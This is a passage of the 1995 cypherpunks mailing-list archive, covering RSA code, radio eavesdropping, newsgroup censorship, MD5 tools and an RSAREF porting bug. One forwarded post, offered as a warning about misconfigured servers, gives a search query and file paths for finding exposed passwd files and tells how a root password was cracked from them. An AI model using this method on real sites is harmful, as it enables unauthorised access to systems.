freeBignum(cmp); return retval; } #ifdef K_AND_R _TYPE( void ) freeRSASig(sig) RSASignature *sig; #else _TYPE( void ) freeRSASig(RSASignature *sig) #endif { freeBignum((BigInt)sig); } #ifdef K_AND_R _TYPE( void ) RSAPrivateKeyDesEncrypt(pk, deskey) RSAPrivateKey *pk; unsigned char *deskey; #else _TYPE( void ) RSAPrivateKeyDesEncrypt(RSAPrivateKey *pk, unsigned char *deskey) #endif { bignumDesEncrypt(pk->publicExponent, deskey); bignumDesEncrypt(pk->privateExponent, deskey); bignumDesEncrypt(pk->modulus, deskey); bignumDesEncrypt(pk->crt->p, deskey); bignumDesEncrypt(pk->crt->q, deskey); bignumDesEncrypt(pk->crt->dp, deskey); bignumDesEncrypt(pk->crt->dq, deskey); bignumDesEncrypt(pk->crt->c12, deskey); } #ifdef K_AND_R _TYPE( void ) RSAPrivateKeyDesDecrypt(pk, deskey) RSAPrivateKey *pk; unsigned char *deskey; #else _TYPE( void ) RSAPrivateKeyDesDecrypt(RSAPrivateKey *pk, unsigned char *deskey) #endif { bignumDesDecrypt(pk->publicExponent, deskey); bignumDesDecrypt(pk->privateExponent, deskey); bignumDesDecrypt(pk->modulus, deskey); bignumDesDecrypt(pk->crt->p, deskey); bignumDesDecrypt(pk->crt->q, deskey); bignumDesDecrypt(pk->crt->dp, deskey); bignumDesDecrypt(pk->crt->dq, deskey); bignumDesDecrypt(pk->crt->c12, deskey); } #ifdef K_AND_R _TYPE( BigInt ) quantized_RSADecrypt(m, key) BigInt m; RSAPrivateKey *key; #else _TYPE( BigInt ) quantized_RSADecrypt(BigInt m, RSAPrivateKey *key) #endif { BigInt result; start_quantize(STD_QUANTUM); result = RSADecrypt(m, key); end_quantize(); return result; } #ifdef K_AND_R _TYPE( RSASignature *) quantized_RSASign(m, key) BigInt m; RSAPrivateKey *key; #else _TYPE( RSASignature *) quantized_RSASign(BigInt m, RSAPrivateKey *key) #endif { return (RSASignature *)quantized_RSADecrypt(m, key); } From die at pig.die.com Wed Dec 27 18:01:04 1995 From: die at pig.die.com (Dave Emery) Date: Thu, 28 Dec 1995 10:01:04 +0800 Subject: Fwd: Re: Fwd: Re: FH radios [Dave Emery] [Vaughan Pratt] In-Reply-To: Message-ID: <9512270551.AA23874@pig.die.com> > > This is all wishful thinking. A 26-MHz wide channel such as 902-928MHz > has a channel capacity of 2*26 Mbs or 6.5 megabytes/sec. So if someone That is not what Mr Shannon says, Shannon's law relates date rate, bandwidth and signal to noise ratio - the "channel capacity" of 26 mhz of spectrum is determined by the signal to noise ratio in the 26 mhz channel and ranges from much less than 26 mbs to several times that rate depending on the signal to noise ratio (and of course how clever the modulation technology is at exploiting it). Witness a 28.8 kb modem which stuffs 28.8 kb into less than 3.2 khz given about 32 db gross SNR. But more significant to the predection recording technique you are talking about is how many samples a second it takes to reproduce information in the 26 mhz bandwidth. Crudely, as a rule of thumb the Nyquist criterion would suggest that you need to sample at twice the highest frequency (or 26 mhz if you downtranslate to DC). This means 52 megasamples per second. Now depending on how much junk there is in the 902-928 mhz band at the location of interest and how far below the other signals the signal of interest is, you might be able to get away with 8 bit samples (providing about 35 db dynamic range) but would probably need more bits than that for things to work reliably. Say 12 bits (72 Mbytes sec) or 16 bits (104 Mbytes/sec), Yes, perhaps compression could buy you back some of that, but you are still realisticlly talking about recording somewhere between maybe 20 and 100 Mbytes/sec. The low end of this range is about the upper limit of present day high performance disk system bandwidth. So you are not talking about a simple configuration with off the shelf disks and controllers (unless you run several in parallel). And one minute of audio gobbles up way more than a gigabyte, or less than 2 minutes per $K of disk cost. And that assumes some compression. > can tell *that* you are transmitting somewhere within that channel then > they simply record *everything* at that data rate in the entire > channel, your transmission and everyone else's, for the necessary > time. A $600 3.5Gb Sequel drive can record a ten-minute transmission; > then the eavesdropper can use one Pentium or two dozen, budget > permitting, to extract your message from that data. If all you are > doing is frequency hopping or spread spectrum, reconstruction is a very > undemanding algorithmic task, and one Pentium should be able to > reconstruct your signal the same day, two dozen the same hour. > I will agree that such techniques can be used, and am well aware that they have been used for the last 25 or so years by the NSA and other like organizations for handling this kind of problem (originally in the HF radio spectrum for finding and reading covert burst transmissions - at least so I have heard). > >But to get back to the original point of this thread - while > >such techniques are possible (as is full hard encryption), it is my > >understanding that actual conusmer 900 mhz digital cordless phones > >that use frequency hopping use a very limited set of frequencies > >and a small set of fixed hopping patterns and don't hop very fast. > > Hopping speed is almost completely irrelevant to the computational > complexity of this problem. > I agree in general, though the degenerate case of very slow hopping permits of some simplifications and speedups since demodulating bits between hops can be done with less computation per sample than estimating where the next hop frequency is when it is unknown. And a phone that slowly hops in a fixed simple pattern onto a small number of channels can be demodulated by very simple approaches indeed, including much less sophisticated and costly ones than fast DSP of wideband sampled channels. > > You can never overestimate the cost of decryption. What looks > expensive enough today to decrypt can plummet by orders of magnitude on > alarmingly short notice. We used to think TCP was mildly secure until > easily installed sniffers became freely available on the internet that > would reconstruct a telnet connection and print out the first 100 > characters, making it child's play to extract passwords. > I must say that I was not amoung those who ever thought that TCP was secure, perhaps because I have spent too much time looking at packet dumps from protocol analyzers and bus traffic on logic analyzers. And even the oldest and slowest systems could reconstruct TCP - it was not a leap of system technology at all, but a leap of hacker application skills and awareness. I hate to even whisper the other places in the fragile web of our infrastructure that are vulnerable to intelligent attack ... there are many unexploited holes left even as we plug some of the obvious ones. The good thing is that people are begining to think about them. > If you think that you are secure because the effort of an attack seems > on the high side, bear in mind that the tasks in a systematic attack can > by definition of "systematic" be programmed, greatly easing the > attacker's task. And once programmed, the program can be distributed to > all and sundry on the internet. > That I agree with and think the current rash of sophisticated hacker tools in the hands of relatively unsophisticated kids who could in no way have created them proves your point well. > If a given level of cryptographic strength seems adequate for a message, > add several orders of magnitude and maybe you'll be lucky. > I wouldn't consider hopping or spread spectrum cryptography. Historically they have been viewed as techniques for avoiding jamming and interference and sometimes also for making signals harder to find rather than as information security techniques. Their use in cordless phones is primarily to aviod interference from other users of the 902-928 band and not for security. > I know of only two really satisfactory places to hide information worth > hiding: combinatorial search space (read: real encryption such as DES > or RSA, with a hefty key), I think we all agree that security by obscurity is not real security at all. But even the security of mathematical crypto is mostly unproven as of yet - we merely think things are difficult to compute because we don't know an easy way to do it, not because there is a clear proof that is true. Dave Emery From proff at suburbia.net Thu Dec 28 10:11:43 1995 From: proff at suburbia.net (Julian Assange) Date: Thu, 28 Dec 95 10:11:43 PST Subject: Premail web server strangeness Message-ID: <199512281811.FAA20893@suburbia.net> Suprising amount of information one can gain from an env array, really. .... SORRY DISPLAY=callisto:0.0 EDITOR=/usr/sww/bin/emacsclient HOME=/ HOST=kiwi.cs.berkeley.edu HOSTTYPE=alpha LOGNAME=root LPDEST=lws510 MACHTYPE=alpha MAIL=/var/spool/mail/raph MANPATH=/private/raph/man:/usr/kerberos/man:/usr/sww/man:/usr/sww/X11/man:/usr/man:/usr/local/man MITSCHEME_LIBRARY_PATH=/usr2/fa92/c263/scheme/lib MPL=CMMD NNTPSERVER=agate OSTYPE=osf1 PAGER=/usr/sww/bin/less -r PATH=/usr/bin:/usr/sww/bin PGPPATH=/private/raph/.pgp PRINTER=lws510 PWD=/private/raph REMOTEHOST=callisto.HIP.Berkeley.EDU SHELL=/bin/sh SHLVL=2 TERM=xterm USER=root VENDOR=dec SERVER_SOFTWARE=Raph's li'l server 0.04 HTTP_ACCEPT=application/x-csh HTTP_FROM= HTTP_REFERER=http://kiwi.cs.berkeley.edu/cgi-bin/premail-0.42.tar.gz?question1=Yes&question2=Yes HTTP_USER_AGENT= QUERY_STRING=question1=Yes&question2=Yes Sorry, can't serve the document. -- +----------------------------------+-----------------------------------------+ |Julian Assange | "if you think the United States has | |FAX: +61-3-9819-9066 | has stood still, who built the largest | |EMAIL: proff at suburbia.net | shopping centre in the world?" - Nixon | +----------------------------------+-----------------------------------------+ From EALLENSMITH at mbcl.rutgers.edu Thu Dec 28 10:11:46 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Thu, 28 Dec 95 10:11:46 PST Subject: Telcom bill report Message-ID: <01HZCBJ2O0DC8Y55KS@mbcl.rutgers.edu> From: IN%"futplex at pseudonym.com" 28-DEC-1995 01:20:39.13 >Thanks ever so much for posting my non-list-relevant private mail to the list. ------------ Oh, bloody hell. Oops... you (and anyone else bothered by the, as you point out, irrelevant mail) have my sincerest apologies. I didn't notice the lack of a CC: to cypherpunks (it's buried in the headers and I was lacking in sleep, but that's no excuse), and consequently goofed. -Allen From adam at lighthouse.homeport.org Wed Dec 27 18:22:08 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Thu, 28 Dec 1995 10:22:08 +0800 Subject: MD5 for DOS/Windows In-Reply-To: Message-ID: <199512271437.JAA04030@homeport.org> | Anybody have a DOS or Windows implementation of MD5 available? | Thanks. Anytime I need to find crypto code, I go to the University of Milan. ftp.dsi.unimi.it The best selection of hash functions, raw ciphers, PGP, and much other stuff I know of. Worth a place in your hotlists. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From a-kurtb at microsoft.com Thu Dec 28 10:52:58 1995 From: a-kurtb at microsoft.com (Kurt Buff (Volt Comp)) Date: Thu, 28 Dec 95 10:52:58 PST Subject: FW: proposal for new cyber abbreviation Message-ID: TOBAL - There Oughta Be A Law... Same thing, easier on the mouth. Kurt ---------- From: Vladimir Z. Nuri[SMTP:vznuri at netcom.com] Sent: Wednesday, December 27, 1995 11:47 To: cypherpunks at toad.com Subject: proposal for new cyber abbreviation yes, cyberspace just doesn't have enough acronyms like AFAIK and IANAL etc. ad nauseam. (I have reason to believe that PTB, or "powers that be" was actually invented here on this list!!) anyway after reading recent messages I propose: SHTBD!!!! as in, Something Has To Be Done. used either seriously or satirically (probably mostly satirically by everyone here). example: "there was a editorialist on TV ranting about the 4 horsemen of the infocalypse and screeching that SHTBD!!!" or, "I was not implying that SHTBD, merely that we are moving into a brave new world in cyberspace". or, "those @#$%^&* online pedophiles are crawling all over the net. SHTBD!!!" or, "the @#%^^&* mainstream press is always pointing out new bogeymen with the concluding moral, SHTBD!!!" notice that SHTBD is the antithesis of cypherpunk philosophy in that it tends to imply 1. government intervention 2. coercive force 3. censorship etc. hence by using this term and popularizing it, we promote our own agenda of "cryptoanarchy". just my small contribution to humanity for today. From jpp at software.net Wed Dec 27 20:19:18 1995 From: jpp at software.net (John Pettitt) Date: Thu, 28 Dec 1995 12:19:18 +0800 Subject: FYI - telecom bill or not there are still censors Message-ID: <2.2.32.19951227172007.0070f34c@mail.software.net> This arrived in my mailbox (I have *not* personally confirmed it) .... According to reports popping up in other places around the Compuserve Information Service it appears that they have taken a stance of Internet censor and are now blocking access to certain Usenet newsgroups. This move took place just before the Christmas holiday and remains unannounced to the membership/subscriber base. Just about any Usenet newsgroup with the word "sex" or "erotica" are no longer available. Attempts to subscribe to these newsgroups produces an error message stating that the newsgroup does not exist. In reality its access has been blocked. A short list (very short) of other newsgroup feeds that are no longer accessible as provided by another party to me include: alt.homosexual alt.magick.sex alt.magick.sex.angst alt.motss.bisexua-l alt.politics.sex alt.recovery.addiction.sexual alt.recovery.sexual-addiction alt.religion.sexuality alt.sex alt.support.disabled.sexuality clari.news.crime.sex clari.news.gays clari.news.sex gay-net.coming-out rec.arts.erotica shamash.gayjews soc.support.youth.gay-lesbian-bi Other newsgroups also remain blocked or eliminated from a provided pick-list and if this is allowed to continue the likelihood of this spreading to other topics that a select group find offensive or intolerable is a very real threat. A number of these newsgroups are legitimate groups for people needing support or recovery or places where frank discussions on adult subjects take place. Some are religious in nature though non-mainstream. Others are associated with the gay lifestyle. As you can see there is a definite trend being set here. So far much of this change in access remains unknown to the vast majority of Compuserve customers who remain away from their terminals for the holidays. If this bothers you I would suggest that you send a message to Compuserve customer services at GO FEEDBACK. Those using autopilot programs send e-mail to Feedback at 70006,101. From outside of Compuserve send e-mail to 70006.101 at compuserve.com We are supposedly paying a monthly fee which includes =full= Internet service and access. We are no longer getting it. That is misrepresentation. Take this issue to your other favorite forums, newsgroups, etc. If we allow freedom of speech and access to be lost now we will never get it back. From rsalz at osf.org Wed Dec 27 20:20:05 1995 From: rsalz at osf.org (Rich Salz) Date: Thu, 28 Dec 1995 12:20:05 +0800 Subject: Some IETF drafts possibly of interest Message-ID: <9512271701.AA17855@sulphur.osf.org> Internet-Drafts are available by anonymous FTP to ds.internic.net in the directory internet-drafts. Other places, too -- don't ask me, tho; for questions, please mail to Internet-Drafts at cnri.reston.va.us. The first two seem interesting even if SKIP has no future in IPng. The last is useful because I keep pushing GSSAPI as a standard crypto API. :) Title : Encoding of an Unsigned Diffie-Hellman Public Value Author(s) : A. Aziz, T. Markson, H. Prafullchandra Filename : draft-ietf-ipsec-skip-udh-00.txt Pages : 6 Date : 12/22/1995 It is useful to be able to communicate public keys in the absence of a certificate hierarchy and a signature infrastructure. This document describes a method by which certificates which communicate Diffie-Hellman public values and parameters may be encoded and securely named. Title : Certificate Discovery Protocol Author(s) : A. Aziz, T. Markson, H. Prafullchandra Filename : draft-ietf-ipsec-cdp-00.txt Pages : 13 Date : 12/22/1995 Use of Public key cryptography is becoming widespread on the Internet in such applications as electronic mail and IP Security (IPSEC). Currently, however, a common public key certificate infrastructure does not exist which is interoperable with other systems and ubiquitous. In light of this, we describe a protocol which may be used to exchange or retrieve certificates (essentially signed public keys) with or from another entity. The protocol may be used to request certificates from a directory/name server or from the entity who owns the certificate. Title : The Simple Public-Key GSS-API Mechanism (SPKM) Author(s) : C. Adams Filename : draft-ietf-cat-spkmgss-05.txt Pages : 42 Date : 12/22/1995 This specification defines protocols, procedures, and conventions to be employed by peers implementing the Generic Security Service Application Program Interface (as specified in RFCs 1508 and 1509) when using the Simple Public-Key Mechanism. From jim at SmallWorks.COM Wed Dec 27 20:20:09 1995 From: jim at SmallWorks.COM (Jim Thompson) Date: Thu, 28 Dec 1995 12:20:09 +0800 Subject: Cybercash security Message-ID: <9512271711.AA13714@hosaka.smallworks.com> The thing I'd like to understand about Cybercash is... how do I get the cash back out of the system? From wlkngowl at unix.asb.com Thu Dec 28 12:25:56 1995 From: wlkngowl at unix.asb.com (wlkngowl at unix.asb.com) Date: Thu, 28 Dec 95 12:25:56 PST Subject: ANNOUNCE: NOISE.SYS random sampling device for DOS v0.2Beta Message-ID: <199512282034.PAA25359@UNiX.asb.com> -----BEGIN PGP SIGNED MESSAGE----- Re: NOISE.SYS Random Sampling Device Driver for DOS (v0.2-Beta): I've finally gotten a usable version of NOISE.SYS written. The beta is ready for semi-public release and review. If you're interested in testing it or examing the code, email me at It's only a prototype version. I do not know any strong methods of testing random data. If anyone is willing to help on that part or point me in the right direction, it would be appreciated... What this driver does: When loaded, it hooks onto the keyboard interrupt (0x09) and collected fast timings between keystrokes. It can also be easily configured at compilation to sample other interrupts, as well as collect "seedling" keystrokes upon initialization. It sets up a character device called RANDOM, that when polled takes the earliest collected bytes from the random pool (size can be adjusted), combines them with a count-word based on the number of samples collected plus the number of times the driver has fetched data from the pool, transforms it using the Secure Hash algorithm, and outputs the bits from the hash. It's only a prototype: this version doesn't check to see if the pool is "empty" at the moment. Features: written in 386 assembler, takes under 2k of memory and can be loaded from the command line using a utility like DEVLOD. Also under GPL, so you've got the source-code to play with. Comments and criticism from crypto-gurus would be greatly appreciated. Reply if you'd like me to send a copy. (Important Q: is this software covered under ITAR?!?) - --Rob -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMOL8gNscUKerH0gxAQHNlAP/eZChSaAEg3go/vxfm9Z0Af5Dfa4WBDhh SfbbpsYfymSkxFbU7bHUfRMFHk+Uy57AeGMUxXkgml7KO8cxyOPS6yVDcNWf6Z9W OeXtXRAFBWRn3CblT1sQzl5YCEG93YBZS9ZkbTsN4rgTcpo15QY8vG5BJCEgfP9f 9XHn5VGSkVo= =jaNN -----END PGP SIGNATURE----- From wlkngowl at unix.asb.com Thu Dec 28 12:26:14 1995 From: wlkngowl at unix.asb.com (wlkngowl at unix.asb.com) Date: Thu, 28 Dec 95 12:26:14 PST Subject: ANNOUNCE: NOISE.SYS random sampling device for DOS v0.2Beta Message-ID: <199512282034.PAA25370@UNiX.asb.com> -----BEGIN PGP SIGNED MESSAGE----- Re: NOISE.SYS Random Sampling Device Driver for DOS (v0.2-Beta): I've finally gotten a usable version of NOISE.SYS written. The beta is ready for semi-public release and review. If you're interested in testing it or examing the code, email me at It's only a prototype version. I do not know any strong methods of testing random data. If anyone is willing to help on that part or point me in the right direction, it would be appreciated... What this driver does: When loaded, it hooks onto the keyboard interrupt (0x09) and collected fast timings between keystrokes. It can also be easily configured at compilation to sample other interrupts, as well as collect "seedling" keystrokes upon initialization. It sets up a character device called RANDOM, that when polled takes the earliest collected bytes from the random pool (size can be adjusted), combines them with a count-word based on the number of samples collected plus the number of times the driver has fetched data from the pool, transforms it using the Secure Hash algorithm, and outputs the bits from the hash. It's only a prototype: this version doesn't check to see if the pool is "empty" at the moment. Features: written in 386 assembler, takes under 2k of memory and can be loaded from the command line using a utility like DEVLOD. Also under GPL, so you've got the source-code to play with. Comments and criticism from crypto-gurus would be greatly appreciated. Reply if you'd like me to send a copy. (Important Q: is this software covered under ITAR?!?) - --Rob -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMOL8gNscUKerH0gxAQHNlAP/eZChSaAEg3go/vxfm9Z0Af5Dfa4WBDhh SfbbpsYfymSkxFbU7bHUfRMFHk+Uy57AeGMUxXkgml7KO8cxyOPS6yVDcNWf6Z9W OeXtXRAFBWRn3CblT1sQzl5YCEG93YBZS9ZkbTsN4rgTcpo15QY8vG5BJCEgfP9f 9XHn5VGSkVo= =jaNN -----END PGP SIGNATURE----- From jsw at netscape.com Wed Dec 27 20:32:14 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Thu, 28 Dec 1995 12:32:14 +0800 Subject: fun with rsaref and 64-bit machines In-Reply-To: <199512270120.RAA19559@infinity.c2.org> Message-ID: <30E12C02.54F7@netscape.com> sameer wrote: > > Does anyone know if RSAREF works on 64 bit CPUs? It seems > that RSAREF's NN_Mod is getting stuck in digit.c at: > > 99 */ > 100 while ((t[1] > 0) || ((t[1] == 0) && t[0] >= c)) { > 101 if ((t[0] -= c) > (MAX_NN_DIGIT - c)) > 102 t[1]--; > 103 aLow++; > 104 } In global.h, UINT4 is typedef'd to be unsigned long int, which is a 64 bit value on the DEC alpha system. The type UINT4 is supposed to be a 32-bit value. On the DEC system you need to make that be an unsigned int, which is 32-bits. I've complained to RSA before about this problem, as it bit me when I was porting SSLREF to the DEC machine. They mumbled something about people using the pre-compiled libraries, and ignored me. It would be so easy for them to just ifdef this one line... --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From sjb at universe.digex.net Thu Dec 28 12:44:44 1995 From: sjb at universe.digex.net (Scott Brickner) Date: Thu, 28 Dec 95 12:44:44 PST Subject: DOS - MD5 - Thanks In-Reply-To: Message-ID: <199512282039.PAA21627@universe.digex.net> "P.J. Ponder" writes: >Thanks to everyone who offered help on the MD5 for DOS. >Greg Broiles pointed me to the pgp source, which may do the >trick. (There is MD5 module in pgp[?]) I will investigate. > >For everyone's info, didn't find a freestanding dos >implementation, tho. My copy of Schneier didn't have the >disk, so I don't know if it's there, either. I have source code to a program called "md5sum". The comments indicate that it works on DOS, as well as unix. It's three source files, a "main", a ".h", and "md5.c", which implements the md5 hash. Want it? P.S. There's also source code for MD5 in the RFC1321, available from ftp.internic.net. From sameer at c2.org Wed Dec 27 21:05:46 1995 From: sameer at c2.org (sameer) Date: Thu, 28 Dec 1995 13:05:46 +0800 Subject: fun with rsaref and 64-bit machines In-Reply-To: <30E12C02.54F7@netscape.com> Message-ID: <199512271646.IAA23331@infinity.c2.org> That fixes it, thanks. > > sameer wrote: > > > > Does anyone know if RSAREF works on 64 bit CPUs? It seems > > that RSAREF's NN_Mod is getting stuck in digit.c at: > > > > 99 */ > > 100 while ((t[1] > 0) || ((t[1] == 0) && t[0] >= c)) { > > 101 if ((t[0] -= c) > (MAX_NN_DIGIT - c)) > > 102 t[1]--; > > 103 aLow++; > > 104 } > > In global.h, UINT4 is typedef'd to be unsigned long int, which is a 64 bit > value on the DEC alpha system. The type UINT4 is supposed to be a 32-bit > value. On the DEC system you need to make that be an unsigned int, which is > 32-bits. I've complained to RSA before about this problem, as it bit me > when I was porting SSLREF to the DEC machine. They mumbled something about > people using the pre-compiled libraries, and ignored me. It would be > so easy for them to just ifdef this one line... > > --Jeff > > -- > Jeff Weinstein - Electronic Munitions Specialist > Netscape Communication Corporation > jsw at netscape.com - http://home.netscape.com/people/jsw > Any opinions expressed above are mine. > -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From jeffb at sware.com Wed Dec 27 21:16:30 1995 From: jeffb at sware.com (Jeff Barber) Date: Thu, 28 Dec 1995 13:16:30 +0800 Subject: another anonymous poster helping to destroy our rights In-Reply-To: <9512271343.AA13409@all.net> Message-ID: <199512271725.MAA00248@jafar.sware.com> Fred Cohen writes: > > We just heard from another anonymous poster trying to destroy our rights > to free speech. How long will the cypherpunks put up with this? As Tim May has explained over and over again, "the cypherpunks" do not exist. Cypherpunks is a mailing list, not a society or club. "The cypherpunks" as a group can do nothing about what gets posted to this list except comment on it. BTW, it would be helpful if you would provide some context when you complain or comment about another posting. At the time I read your note, it was the only cypherpunks note in my mailbox. Perhaps I read some message earlier from the ECafe anonymous mailer but if so, it certainly wasn't remarkable enough to leave a lasting impression. Finally, it should be noted that the kind of messages you're posting lately are eerily reminiscent of Detweiler's mental deterioration just before he went off the deep end. In fact, the line "How long will the cypherpunks put up with this?" may be an exact quote. -- Jeff From sjb at universe.digex.net Thu Dec 28 13:26:59 1995 From: sjb at universe.digex.net (Scott Brickner) Date: Thu, 28 Dec 95 13:26:59 PST Subject: Employer Probing Precedents? In-Reply-To: Message-ID: <199512282126.QAA22624@universe.digex.net> David Mandl writes: >All I'll say here is that I disagree strongly with the views Tim May >posted about employees' property rights, etc. (though we agree on most >other things). I have to agree with David. I don't think that "property rights" are quite as clear-cut as Tim claims. By granting use of certain equipment to a single employee, such as a desk, a uniform, or personal computer, the employer has invested that employee with a vague sort of limited ownership of the item. The notion that, simply because you're wearing a uniform owned by your employer, you're subject to physical search at the employer's discretion is laughable. The difference between this and searching the computer on one's desk differ only in degree, IMO. Property rights *are* fundamental to many other human rights, but they aren't the exclusive basis of them. The right of self-determination isn't based in property (except to the extent that one may be said to inalienably own oneself, but this is really an analogy), and is equally fundamental to human rights. Many of the issues related to workplace privacy concerns exhibit conflicts between these two. From gorkab at sanchez.com Thu Dec 28 14:01:43 1995 From: gorkab at sanchez.com (Brian Gorka) Date: Thu, 28 Dec 95 14:01:43 PST Subject: IwinPak Message-ID: <01BAD546.1C3B8640@loki> Has anyone ever seen or heard of this company? They use PGP as an encryption transport for secure mail and transactions (at a price of course) http://www.iwinpak.com From fc at all.net Wed Dec 27 22:07:40 1995 From: fc at all.net (Fred Cohen) Date: Thu, 28 Dec 1995 14:07:40 +0800 Subject: another anonymous poster helping to destroy our rights In-Reply-To: <199512271335.NAA07018@pangaea.ang.ecafe.org> Message-ID: <9512271343.AA13409@all.net> We just heard from another anonymous poster trying to destroy our rights to free speech. How long will the cypherpunks put up with this? -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From dklur at dttus.com Wed Dec 27 22:12:55 1995 From: dklur at dttus.com (David Klur) Date: Thu, 28 Dec 1995 14:12:55 +0800 Subject: Misconfigured Web Servers Message-ID: <9511278200.AA820083186@cc2.dttus.com> Re: the "trick" below... an even more effective search is the following... http://www.altavista.digital.com/cgi-bin/query?pg=aq&what=web&q=url%3A etc%2Fpasswd&r=&d0=&d1=&Submit.x=51&Submit.y=14 which searches all URLs that contain etc/passwd See for yourself! David Klur _____________________________ Reply Separator _________________________________ Subject: BoS: Misconfigured Web Servers Author: nobody at mail.uu.net at Internet-USA Date: 12/26/95 3:57 PM Everyone, A friend of mine showed me a nasty little "trick" over the weekend. He went to a Web Search server (http://www.altavista.digital.com/) and did a search on the following keywords - root: 0:0 sync: bin: daemon: You get the idea. He copied out several encrypted root passwords from passwd files, launched CrackerJack and a 1/2 MB word file and had a root password in under 30 minutes. All without accessing the site's server, just the index on a web search server! Well, the first thing I did was check my site and it's ok. The second thing I did was check my ISP for my home account, and it's okay. But by trying various combinations of common accounts on web searches, dozens of passwd files were found. It seems that a large number of locations who use httpd and ftpd on the same server often copy the regular passwd file to ftp/etc or ftp-users/etc for ftp user access. A few sites have left the root password in the file, and many contain user accounts' passwords. The problems I see here are as follows: 1. You can get the passwd file in some cases by simply pointing your URL to http://target.com/ftp/etc/passwd or http://target.com/ftp-users/etc/passwd. Not good. Anon ftp can't get it but a web browser can. Many passwd files are shadowed but you can see some legit account names. Yes, I realize that this may be a dummy file but hey, not always the case. 2. Some sites do not have the passwd file world readable, but the entire passwd file stills exists indexed on the web search server. I don't know about you, but I don't think I'd want my passwd file indexed and searchable on a world accessible web server. 3. A ton of etc/group files turned up as well. The guy that showed me this found it funny, but I find it disturbing. Are there that many sites that are that poorly configured? Mark_W_Loveless at smtp.bnr.com From Kevin.L.Prigge-2 at cis.umn.edu Thu Dec 28 14:12:55 1995 From: Kevin.L.Prigge-2 at cis.umn.edu (Kevin L Prigge) Date: Thu, 28 Dec 95 14:12:55 PST Subject: URL for cypherpunks In-Reply-To: <199512281556.KAA05580@homeport.org> Message-ID: <30e316546c20002@noc.cis.umn.edu> According to rumor, Adam Shostack said: > > The csua.cs.bezerkely site is good, but hasn't been maintained > in a while. (Unfortunately, there is enough cypherpunk & related > stuff out there that maintaining a really good site would be a full > time job. Thats not a flame at any of the people out there who do good > work, just a wish for a really well organized www.cypherpunks.org > library & pointer list, should someone decide to pay for it. :) Looks like someone has... maroon% whois2 cypherpunks.org CypherPunks Group (CYPHERPUNKS3-DOM) 9705 Standford Road Ft. Meade, MD 20755 Domain Name: CYPHERPUNKS.ORG Administrative Contact, Technical Contact, Zone Contact: One, Aleph (EML2) aleph1 at DFW.NET 999-999-9999 Record last updated on 03-Oct-95. Record created on 03-Oct-95. Domain servers in listed order: DNS.CYBERWORKS.NET 205.164.71.20 NS2.PARANOIA.COM 204.157.153.18 WKP.COM 205.199.64.11 The InterNIC Registration Services Host contains ONLY Internet Information (Networks, ASN's, Domains, and POC's). Please use the whois server at nic.ddn.mil for MILNET Information. maroon% host www.cypherpunks.org www.cypherpunks.org is a nickname for cypherpunks.org cypherpunks.org has address 205.164.71.100 -- Kevin L. Prigge |"Have you ever gotten tired of hearing those UofM Central Computing | ridiculous AT&T commercials claiming credit email: klp at tc.umn.edu | for things that don't even exist yet? 010010011101011001100010| You will." -Emmanuel Goldstein From vznuri at netcom.com Wed Dec 27 23:39:28 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Thu, 28 Dec 1995 15:39:28 +0800 Subject: proposal for new cyber abbreviation Message-ID: <199512271947.LAA22943@netcom17.netcom.com> yes, cyberspace just doesn't have enough acronyms like AFAIK and IANAL etc. ad nauseam. (I have reason to believe that PTB, or "powers that be" was actually invented here on this list!!) anyway after reading recent messages I propose: SHTBD!!!! as in, Something Has To Be Done. used either seriously or satirically (probably mostly satirically by everyone here). example: "there was a editorialist on TV ranting about the 4 horsemen of the infocalypse and screeching that SHTBD!!!" or, "I was not implying that SHTBD, merely that we are moving into a brave new world in cyberspace". or, "those @#$%^&* online pedophiles are crawling all over the net. SHTBD!!!" or, "the @#%^^&* mainstream press is always pointing out new bogeymen with the concluding moral, SHTBD!!!" notice that SHTBD is the antithesis of cypherpunk philosophy in that it tends to imply 1. government intervention 2. coercive force 3. censorship etc. hence by using this term and popularizing it, we promote our own agenda of "cryptoanarchy". just my small contribution to humanity for today. From perry at piermont.com Wed Dec 27 23:54:14 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 28 Dec 1995 15:54:14 +0800 Subject: Some IETF drafts possibly of interest In-Reply-To: <9512271701.AA17855@sulphur.osf.org> Message-ID: <199512271913.OAA06367@jekyll.piermont.com> Rich Salz writes: > The first two seem interesting even if SKIP has no future in IPng. Thats why the group pushed Ashar to split up his document up (at the IETF meeting in Dallas earlier this month). Perry From vznuri at netcom.com Thu Dec 28 00:32:36 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Thu, 28 Dec 1995 16:32:36 +0800 Subject: cool cpunk project proposal: "cpunk approved" logo Message-ID: <199512271959.LAA23984@netcom17.netcom.com> recently my local newspaper ran a section on privacy preservation in cyberspace. it quoted Dave Banisar of CPSR as talking about how future companies might have a "privacy safe" sticker affixed to them. *wow*, what a great idea. this would be a great project for the cpunks. most people here are familiar with Point Communications and how they do the "top 5% of web sites" and authorize sites to use their logo. this is such a neat idea: it's one of the first reputation rating companies in existence, in a sense. furthermore, it's *private*. TCM and others have advocated that these companies are going to become ubiquitous (rating *everything* including hot-button things like doctors, lawyers, hit men, etc. ) and I can see it happening quickly. here's my idea that some enterprising cpunks might like to pursue. create a CYPHERPUNK PRIVACY SAFE logo and distribute it to various companies who adhere to the criteria that it names!!! the steps would be: 1. create a logo 2. create a set of criteria for companies who are "privacy safe" or who adhere to cpunk privacy guidelines. 3. write out this list in careful detail. one might also have different levels or grades, such as "level 5 privacy protection" etc. one could conceivably use it as a negative reinforcement too, handing out "F's" to the worst companies. 4. POPULARIZE this. get companies to put the logo on their sites like they do with the Web logo. now, I don't know if people here realize how much great potential this idea has. the media just LOVES to quote these kinds of judgements when it's a slow news day (witness 